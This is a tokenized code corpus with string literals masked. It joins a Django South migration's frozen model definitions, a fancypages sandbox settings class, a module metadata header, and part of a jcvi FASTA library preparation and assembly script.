'<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:image>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" . format ( FP_NODE_MODEL ) } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:path>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:status>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> u'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> u'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:text>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> u'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> u'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:2>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) <EOL> } , <EOL> FP_NODE_MODEL : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : FP_NODE_MODEL . split ( '<STR_LIT:.>' ) [ <NUM_LIT:1> ] } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:image>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT:path>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> u'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> u'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:text>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> u'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> u'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:text>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> u'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:5>' } ) , <EOL> '<STR_LIT:username>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> u'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' , '<STR_LIT:max_length>' : '<STR_LIT:3>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> u'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:source>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] <EOL> symmetrical = True </s>
<s> from __future__ import unicode_literals , absolute_import <EOL> import os <EOL> import django <EOL> import fancypages as fp <EOL> from configurations import Configuration , values <EOL> class Common ( Configuration ) : <EOL> DEBUG = True <EOL> TEMPLATE_DEBUG = DEBUG <EOL> SECRET_KEY = values . Value ( '<STR_LIT>' ) <EOL> ADMINS = [ ( '<STR_LIT>' , '<STR_LIT>' ) ] <EOL> MANAGERS = ADMINS <EOL> EMAIL_BACKEND = '<STR_LIT>' <EOL> USE_I18N = True <EOL> USE_L10N = True <EOL> USE_TZ = True <EOL> TIME_ZONE = '<STR_LIT>' <EOL> LANGUAGE_CODE = '<STR_LIT>' <EOL> LANGUAGES = ( <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> FP_FORM_BLOCK_CHOICES = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:name>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } } <EOL> MEDIA_URL = '<STR_LIT>' <EOL> STATIC_URL = '<STR_LIT>' <EOL> STATICFILES_DIRS = [ ] <EOL> STATICFILES_FINDERS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> TEMPLATE_LOADERS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> TEMPLATE_CONTEXT_PROCESSORS = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] <EOL> MIDDLEWARE_CLASSES = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> AUTHENTICATION_BACKENDS = ( <EOL> '<STR_LIT>' , ) <EOL> LOGIN_URL = '<STR_LIT>' <EOL> LOGIN_REDIRECT_URL = '<STR_LIT>' <EOL> APPEND_SLASH = True <EOL> ALLOWED_HOSTS = [ '<STR_LIT:*>' ] <EOL> SITE_ID = <NUM_LIT:1> <EOL> @ property <EOL> def ROOT_URLCONF ( self ) : <EOL> return "<STR_LIT>" . format ( self . SANDBOX_MODULE ) <EOL> @ property <EOL> def WSGI_APPLICATION ( self ) : <EOL> return "<STR_LIT>" . format ( self . SANDBOX_MODULE ) <EOL> @ classmethod <EOL> def pre_setup ( cls ) : <EOL> super ( Common , cls ) . pre_setup ( ) <EOL> from fancypages . defaults import FANCYPAGES_SETTINGS <EOL> for key , value in FANCYPAGES_SETTINGS . iteritems ( ) : <EOL> if not hasattr ( cls , key ) : <EOL> setattr ( cls , key , value ) <EOL> @ property <EOL> def TEMPLATE_DIRS ( self ) : <EOL> return [ self . get_location ( '<STR_LIT>' ) ] <EOL> @ property <EOL> def MEDIA_ROOT ( self ) : <EOL> return self . get_location ( '<STR_LIT>' ) <EOL> @ property <EOL> def STATIC_ROOT ( self ) : <EOL> return self . get_location ( '<STR_LIT>' ) <EOL> @ property <EOL> def DATABASES ( self ) : <EOL> return { '<STR_LIT:default>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : self . get_location ( '<STR_LIT>' ) } } <EOL> @ property <EOL> def REQUIRED_APPS ( self ) : <EOL> apps = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] + fp . get_required_apps ( ) + [ '<STR_LIT>' ] <EOL> if django . VERSION [ <NUM_LIT:1> ] < <NUM_LIT:7> : <EOL> apps . append ( '<STR_LIT>' ) <EOL> return apps <EOL> @ classmethod <EOL> def get_location ( cls , * path ) : <EOL> """<STR_LIT>""" <EOL> path = ( cls . SANDBOX_MODULE , ) + path <EOL> return os . path . join ( <EOL> os . path . dirname ( os . path . realpath ( __file__ ) ) , '<STR_LIT:..>' , * path ) </s>
<s> __author__ = ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> __copyright__ = "<STR_LIT>" <EOL> __email__ = "<STR_LIT>" <EOL> __license__ = "<STR_LIT>" <EOL> __status__ = "<STR_LIT>" <EOL> __version__ = "<STR_LIT>" </s>
<s> """<STR_LIT>""" <EOL> import re <EOL> import sys <EOL> import logging <EOL> import os <EOL> import os . path as op <EOL> from jcvi . apps . base import OptionParser , OptionGroup , ActionDispatcher , sh <EOL> def main ( ) : <EOL> actions = ( <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ) <EOL> p = ActionDispatcher ( actions ) <EOL> p . dispatch ( globals ( ) ) <EOL> def prepare ( args ) : <EOL> """<STR_LIT>""" <EOL> from operator import itemgetter <EOL> from jcvi . formats . fasta import Fasta , SeqIO <EOL> p = OptionParser ( prepare . __doc__ ) <EOL> p . add_option ( "<STR_LIT>" , default = None , <EOL> help = "<STR_LIT>" ) <EOL> p . add_option ( "<STR_LIT>" , <EOL> help = "<STR_LIT>" ) <EOL> g = OptionGroup ( p , "<STR_LIT>" ) <EOL> g . add_option ( "<STR_LIT>" , default = "<STR_LIT>" , <EOL> help = "<STR_LIT>" ) <EOL> p . add_option_group ( g ) <EOL> opts , args = p . parse_args ( args ) <EOL> if not opts . rearray_lib or not opts . orig_lib_file : <EOL> logging . error ( "<STR_LIT>" ) <EOL> sys . exit ( not p . print_help ( ) ) <EOL> rearraylib , origlibfile = opts . rearray_lib , opts . orig_lib_file <EOL> if not op . isfile ( origlibfile ) : <EOL> logging . error ( "<STR_LIT>" . format ( origlibfile ) ) <EOL> sys . exit ( ) <EOL> lookuptblfile = rearraylib + '<STR_LIT>' <EOL> logging . debug ( lookuptblfile ) <EOL> if not op . isfile ( lookuptblfile ) : <EOL> logging . error ( "<STR_LIT>" . format ( lookuptblfile ) ) <EOL> sys . exit ( ) <EOL> rearraylibfile = rearraylib + '<STR_LIT>' <EOL> logging . debug ( rearraylibfile ) <EOL> if not op . isfile ( rearraylibfile ) : <EOL> logging . error ( "<STR_LIT>" . format ( rearraylibfile ) ) <EOL> sys . exit ( ) <EOL> origlibFasta = Fasta ( origlibfile ) <EOL> rearraylibFasta = Fasta ( rearraylibfile ) <EOL> origlibids = [ o for o in origlibFasta . iterkeys_ordered ( ) ] <EOL> rearraylibids = [ r for r in rearraylibFasta . iterkeys_ordered ( ) ] <EOL> if not op . isdir ( opts . output_folder ) : <EOL> logging . warning ( "<STR_LIT>" . format ( opts . output_folder ) ) <EOL> os . makedirs ( opts . output_folder ) <EOL> logfile = rearraylib + '<STR_LIT>' <EOL> log = open ( logfile , '<STR_LIT:w>' ) <EOL> fp = open ( lookuptblfile , '<STR_LIT:r>' ) <EOL> for row in fp : <EOL> origprefix , rearrayprefix = itemgetter ( <NUM_LIT:0> , <NUM_LIT:3> ) ( row . split ( '<STR_LIT:\t>' ) ) <EOL> libpair = origprefix + '<STR_LIT:_>' + rearrayprefix <EOL> outfile = opts . output_folder + '<STR_LIT:/>' + libpair + '<STR_LIT>' <EOL> ofp = open ( outfile , '<STR_LIT:w>' ) <EOL> for o in origlibids : <EOL> if re . match ( origprefix , o ) : <EOL> SeqIO . write ( origlibFasta [ o ] , ofp , '<STR_LIT>' ) <EOL> for r in rearraylibids : <EOL> if re . match ( rearrayprefix , r ) : <EOL> SeqIO . write ( rearraylibFasta [ r ] , ofp , '<STR_LIT>' ) <EOL> ofp . close ( ) <EOL> print >> log , outfile <EOL> log . close ( ) <EOL> logging . debug ( '<STR_LIT>' . format ( logfile ) ) <EOL> def assemble ( args ) : <EOL> """<STR_LIT>""" <EOL> p = OptionParser ( assemble . __doc__ ) <EOL> g1 = OptionGroup ( p , "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> g1 . add_option ( "<STR_LIT>" , default = None , <EOL> help = "<STR_LIT>" ) <EOL> g1 . add_option ( "<STR_LIT>" , default = None , <EOL> help = "<STR_LIT>" ) <EOL> g1 . add_option ( "<STR_LIT>" , default = None , <EOL> help = "<STR_LIT>" ) <EOL> p . add_option_group ( g1 ) <EOL> g2 = OptionGroup ( p , "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> g2 . add_option ( "<STR_LIT>" , "<STR_LIT>" , default = <NUM_LIT:20> , type = "<STR_LIT:int>" , <EOL> help = "<STR_LIT>" + "<STR_LIT>" ) <EOL> g2 . add_option ( "<STR_LIT>" , "<STR_LIT>" , default = <NUM_LIT> , type = "<STR_LIT:int>" , <EOL> help = "<STR_LIT>" + "<STR_LIT>" ) <EOL> g2 . add_option ( "<STR_LIT>" , "<STR_LIT>" , default = <NUM_LIT> , type = "<STR_LIT:int>" , <EOL> help = "<STR_LIT>" + "<STR_LIT>" ) <EOL> g2 . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , default = "<STR_LIT>" , <EOL> help = "<STR_LIT>" ) <EOL> p . add_option_group ( g2 ) <EOL> p . set_params ( ) <EOL> opts , args = p . parse_args ( args ) <EOL> if opts . max_gap_len and opts . max_gap_len <= <NUM_LIT:1> : <EOL> logging . error ( "<STR_LIT>" ) <EOL> sys . exit ( ) <EOL> elif opts . ovl_pct_id and opts . ovl_pct_id <= <NUM_LIT> : <EOL> logging . error ( "<STR_LIT>" ) <EOL> sys . exit ( ) <EOL> elif opts . ovl_sim_score and opts . ovl_sim_score <= <NUM_LIT> : <EOL> logging . error ( "<STR_LIT>" ) <EOL> sys . exit ( ) <EOL> file_list = [ ] <EOL> if opts . input_file_list : <EOL> if not op . isfile ( opts . input_file_list ) : <EOL> logging . error ( "<STR_LIT>" . format ( opts . input_file_list ) ) <EOL> sys . 